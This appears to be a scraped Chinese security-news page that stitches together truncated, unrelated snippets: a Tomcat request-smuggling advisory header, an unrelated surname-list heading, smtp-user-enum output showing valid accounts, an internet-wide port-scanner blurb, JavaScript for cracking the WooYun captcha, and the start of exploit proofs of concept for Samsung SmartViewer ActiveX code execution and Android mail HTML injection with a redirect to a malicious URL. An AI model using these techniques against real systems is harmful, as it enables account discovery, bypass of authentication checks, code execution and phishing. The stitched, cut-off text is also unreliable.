CVE-2014-0227 Apache Tomcat Request Smuggling

Message view « Date » · « Thread » Top « Date » · « Thread » From Mark Thomas <ma...@apache.org> Subject [SECURITY] CVE-2014-0227 Apache Tomcat Request Smuggling Date Mon, 09 Feb 2015 09:12:47 GMT -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 CVE-2014-0227 Request Smuggling Severity: Important Vendor: The Apache Software Foundation Versions Affected: - - Apache Tomcat 8.0.0-RC1 to 8.0.8 - - Apache Tomcat 7.0.0 to 7.0.54 - - Apache

中国姓名排行 TOP 500(来自人口数据库)

$ smtp-user-enum.pl -M VRFY -U users.txt -t 10.0.0.1 Starting smtp-user-enum v1.0 ( http://pentestmonkey.net/tools/smtp-user-enum ) ---------------------------------------------------------- | Scan Information | ---------------------------------------------------------- Mode ..................... VRFY Worker Processes ......... 5 Usernames file ........... users.txt Target count ............. 1 Username count ........... 47 Target TCP port .......... 25 Query timeout ............ 5 secs Relay Server ............. Not used ######## Scan started at Sun Jan 21 18:01:50 2007 ######### root@10.0.0.1: Exists bin@10.0.0.1: Exists daemon@10.0.0.1: Exists

Nscan.py - Fast Network Scanner,高速网络扫描器,全网端口扫描神器

Nscan Nscan is a fast Network scanner optimized for internet-wide scanning purposes and inspired by Masscan and Zmap. It has it's own tiny TCP/IP stack and uses Raw sockets to send TCP SYN probes. It doesn't need to set SYN Cookies so it doesn't wastes time checking if a received packet is a result of it's own scan, that makes Nscan faster than other similar scanners. Nscan has a cool

JS破解乌云验证码,JavaScript 验证码识别,js验证码识别

JS破解乌云验证码 p.z (谈钞票伤感情 谈感情又伤钞票又伤感情) | 2015-01-17 15:35 以后盲打乌云后台有验证码也不怕啦 (function(){ function decaptcha(image){ var canvas = document.createElement("canvas").getContext('2d'); var result = ''; var letter = [[],[],[],[]]; var letterArea = { '0': {'x1':14, 'x2':21,

Samsung SmartViewer BackupToAvi 3.0 代码执行漏洞EXP

Samsung SmartViewer BackupToAvi 3.0 - Remote Code Execution。 <html> <!-- Samsung SmartViewer BackupToAvi Remote Code Execution PoC PoC developed by Praveen Darshanam For more details refer http://darshanams.blogspot.com http://blog.disects.com/2015/01/samsung-smartviewer-backuptoavi-remote.html Original Vulnerability Discovered by rgod Vulnerable: Samsung SmartViewer 3.0 Tested on Windows 7 Ultimate N SP1 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9265 --> <object classid='clsid:208650B1-3CA1-4406-926D-45F2DBB9C299' id='target' ></object> <script > var payload_length = 15000; var arg1=1; var arg2=1; var

安卓手机邮件客户端钓鱼漏洞,Android 邮件钓鱼 [CVE-2014-4925]

视频: 安卓邮件客户端漏洞测试 FD 论坛上刚爆出的一个漏洞 poc: <meta http-equiv="refresh" content="0;URL='http://www.maliciousurl.com'" /> 攻击者可以构造一个邮件发给目标并且重定向到固定页面 详情可以 点击 Full Disclosure: Good for Enterprise Android HTML Injection